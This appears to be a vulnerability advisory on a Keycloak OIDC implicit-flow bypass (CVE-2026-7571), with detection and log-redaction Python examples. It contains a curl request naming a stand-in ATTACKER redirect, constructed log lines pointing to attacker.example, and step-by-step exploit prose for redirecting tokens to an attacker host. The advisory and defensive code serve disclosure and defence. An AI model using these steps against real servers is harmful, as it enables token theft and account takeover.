CVE-2026-7571 exposes a critical flaw in Keycloak’s OpenID Connect (OIDC) implementation. A low-privilege attacker, possessing a valid user’s credentials and the target client ID, can bypass security controls designed to disable the insecure OIDC implicit flow.
The vulnerability originates from improper session state handling during client restarts. When a client session restarts, Keycloak fails to maintain the security context that prevents the implicit flow. By forging client data—specifically a manipulated `client_data` parameter—the attacker can effectively reactivate the implicit flow for a client where it was disabled.
This attack chain is possible due to a weakness classified as CWE-472 (External Control of Assumed-Immutable Web Parameter). The implicit flow, a legacy OIDC method that returns access tokens directly in the redirect URL, is generally disabled for modern clients due to its inherent security risks. However, by tampering with session data, the attacker coerces the server into issuing an access token via this forbidden flow.
The attack’s technical mechanics involve the `SessionCodeChecks` component during the login flow restart. A standard login attempt is initiated, but just before the authorization response is sent, the attacker intervenes to restart the session. During this restart, the client’s security configuration is not re-validated, allowing the injection of parameters that request the implicit flow.
The manipulated request contains a modified `client_data` parameter, which includes a different `redirect_uri`. The server, failing to validate this change against the initial client configuration, processes the flow and issues an access token directly to this attacker-controlled URI.
The impact is severe. Not only does the attacker gain an unauthorized access token, but these tokens are also leaked through multiple channels. Access tokens appear in server logs, proxy logs, and HTTP Referer headers, leading to significant sensitive information disclosure. The vulnerability has a CVSS v3.1 base score of 7.1 (HIGH) from Red Hat, with the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N, indicating a network-exploitable flaw with low attack complexity requiring low privileges.
DailyCVE Form:
Platform: Keycloak
Version: 26.3.0-26.6.2
Vulnerability: Implicit Flow Bypass
Severity: 7.1 (HIGH)
Date: 2026-05-19
Prediction: 2026-05-21
What Undercode Say:
- Check Keycloak version:
  $ keycloak/bin/kc.sh version
  $ cat META-INF/keycloak-version.txt
- Detect vulnerable implicit flow endpoint:
  $ curl -k "https://KEYCLOAK_HOST/auth/realms/REALM/protocol/openid-connect/auth?response_type=token&client_id=VULN_CLIENT&redirect_uri=http://ATTACKER/"
- Monitor logs for anomalous "client_data" entries (the alternation needs extended regex, hence `-E`):
  $ journalctl -u keycloak | grep -iE "client_data|implicit|redirect_uri"
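The `grep` above only surfaces raw lines; a defender usually wants the three indicators of this bug checked together per request: an implicit `response_type` for a client whose implicit flow is disabled, a `redirect_uri` that is not registered for that client, and tokens surfacing in `Referer` headers. The following is an added example (not part of this advisory or of Keycloak) that does that over constructed access-log-style lines. The log line format, the `CLIENT_POLICY` table and the hostnames are assumptions for the example; in practice the policy would be exported from the realm's client configuration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real Keycloak output). Assumed format:
# "<ip> <method> <path-with-query> <status> referer=<url-or-dash>"
SAMPLE_LOG = """\
10.0.0.5 GET /realms/demo/protocol/openid-connect/auth?response_type=code&client_id=spa-app&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&code_challenge_method=S256 302 referer=-
10.0.0.9 GET /realms/demo/protocol/openid-connect/auth?response_type=token&client_id=spa-app&redirect_uri=https%3A%2F%2Fattacker.example%2Fcallback 302 referer=-
10.0.0.9 GET /realms/demo/protocol/openid-connect/auth?response_type=code&client_id=spa-app&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&client_data=eyJ... 302 referer=-
10.0.0.7 GET /api/profile 200 referer=https://app.example.com/cb#access_token=eyJhbGciOi.payload.sig&token_type=bearer
"""

# Assumed per-client policy mirroring the realm configuration:
# whether implicit flow is enabled and which redirect URIs are registered.
CLIENT_POLICY = {
    "spa-app": {
        "implicit_enabled": False,
        "redirect_uris": {"https://app.example.com/cb"},
    },
}

LINE_RE = re.compile(
    r"^(?P<ip>\S+) (?P<method>\S+) (?P<target>\S+) (?P<status>\d{3}) referer=(?P<referer>\S+)$"
)
# A token carried in a URL query or fragment (e.g. leaked through Referer).
TOKEN_IN_URL_RE = re.compile(r"[#?&](?:access_token|id_token)=")


def parse_line(line):
    """Split one log line into fields; return None for lines that do not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def check_auth_request(target):
    """Return (kind, detail) findings for one request to the /auth endpoint."""
    findings = []
    parts = urlsplit(target)
    if not parts.path.endswith("/protocol/openid-connect/auth"):
        return findings
    q = parse_qs(parts.query)  # percent-decodes redirect_uri for comparison
    client_id = q.get("client_id", [""])[0]
    policy = CLIENT_POLICY.get(client_id)
    if policy is None:
        return [("unknown_client", client_id)]
    # response_type is space-separated, e.g. "token" or "id_token token".
    response_type = q.get("response_type", [""])[0].split()
    if "token" in response_type and not policy["implicit_enabled"]:
        findings.append(("implicit_flow_requested_for_disabled_client", client_id))
    redirect_uri = q.get("redirect_uri", [""])[0]
    if redirect_uri and redirect_uri not in policy["redirect_uris"]:
        findings.append(("unregistered_redirect_uri", redirect_uri))
    if "client_data" in q:
        findings.append(("client_data_parameter_present", client_id))
    return findings


def scan(log_text):
    """Return a list of (ip, kind, detail) alerts for the whole log text."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for kind, detail in check_auth_request(rec["target"]):
            alerts.append((rec["ip"], kind, detail))
        if TOKEN_IN_URL_RE.search(rec["referer"]):
            # Report the referring page only, never the token value itself.
            alerts.append((rec["ip"], "token_in_referer", rec["referer"].split("#")[0]))
    return alerts


if __name__ == "__main__":
    for ip, kind, detail in scan(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{detail}")
```

The `client_data_parameter_present` finding is deliberately low-severity on its own, since the parameter has legitimate uses; it becomes interesting when it appears from the same source address as an implicit-flow request or an unregistered `redirect_uri`, which is the combination the advisory describes.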
Exploit:
- Prerequisites: A valid user credential, a client ID with implicit flow disabled, network access to the Keycloak instance.
- Initiate: Begin a standard OIDC authorization request for the target client.
- Intercept: Capture the request and modify it mid-session. Spoof the session restart by manipulating the `client_data` parameter.
- Forge: In the `client_data`, set `redirect_uri` to a server you control (e.g., `https://attacker.com/callback`) and include `response_type=token`.
- Acquire: Send the request. Keycloak processes the restarted session without re-validating security controls and issues an access token directly to your `redirect_uri`.
- Leak: The access token is also exposed in the server’s `access.log`, proxy logs, and HTTP Referer headers, enabling further attacks and data harvesting.
Protection:
- Patch: Immediately upgrade Keycloak to version 26.6.2 or higher. This release contains a backported fix for the bypass.
- Network Controls: Implement strict firewall rules to restrict network access to Keycloak authentication endpoints, limiting the attack surface.
- Log Sanitization: Disable or redact sensitive data (e.g., authorization headers, tokens) from all logs (server, proxy, access) to prevent information leakage.
- Deprecate Implicit Flow: If using older clients, migrate them to the Authorization Code Flow with PKCE, eliminating reliance on the implicit flow entirely.
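The log-sanitization item above is easy to state and easy to get wrong, because tokens reach logs through several shapes at once: a URL fragment, a query parameter on a `Referer`, and an `Authorization` header echoed in a debug line. The following is an added example, not Keycloak code and not part of this advisory, of a redaction filter for Python's standard `logging` module that catches all three before any handler writes the record. The log messages are constructed for the example, and the parameter names it redacts are the standard OAuth/OIDC ones; extend the patterns to whatever your proxy or application actually emits.

```python
import logging
import re
from io import StringIO

# Secrets in URL query/fragment form: access_token=, id_token=, refresh_token=, code=.
# The leading \b stops e.g. "status_code=200" from being treated as an auth code.
SECRET_PARAM_RE = re.compile(r"\b(?P<key>(?:access_token|id_token|refresh_token|code)=)[^&#\s\"]+")
# Bearer tokens in an echoed Authorization header.
AUTH_HEADER_RE = re.compile(r"(?i)(Authorization:\s*Bearer\s+)\S+")


def redact(text):
    """Replace token-like values with a fixed marker, keeping the surrounding structure."""
    text = SECRET_PARAM_RE.sub(r"\g<key>[REDACTED]", text)
    text = AUTH_HEADER_RE.sub(r"\1[REDACTED]", text)
    return text


class RedactingFilter(logging.Filter):
    """Rewrite the fully formatted message so %-style args are redacted too."""

    def filter(self, record):
        record.msg = redact(record.getMessage())
        record.args = ()  # already interpolated above
        return True


def demo_lines():
    """Push constructed events through a filtered logger; return the lines written."""
    buf = StringIO()
    logger = logging.getLogger("example.keycloak.access")
    logger.setLevel(logging.INFO)
    logger.propagate = False
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(message)s"))
    handler.addFilter(RedactingFilter())
    logger.handlers = [handler]

    # Constructed: token in a fragment plus an auth code in a Referer query string.
    logger.info("GET /cb#access_token=eyJabc.def.ghi&token_type=bearer referer=%s",
                "https://app.example.com/cb?code=abc123")
    # Constructed: a debug line that echoed the Authorization header.
    logger.info("Authorization: Bearer eyJabc.def.ghi")
    handler.flush()
    return buf.getvalue().splitlines()


if __name__ == "__main__":
    for line in demo_lines():
        print(line)
```

Attaching the filter to the handler rather than the logger is deliberate: records that propagate from child loggers still pass through it, so a library logging under a sub-namespace cannot bypass the redaction. For a reverse proxy in front of Keycloak the equivalent is to log only the path, not the query string or fragment, and to drop the `Referer` and `Authorization` fields from the access-log format.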
Impact:
- Account Takeover: Attackers gain valid access tokens, allowing them to impersonate the compromised user against any application trusting the Keycloak realm. This leads to complete account takeover and unauthorized access to sensitive data and functionalities.
Sources:
Reported By: nvd.nist.gov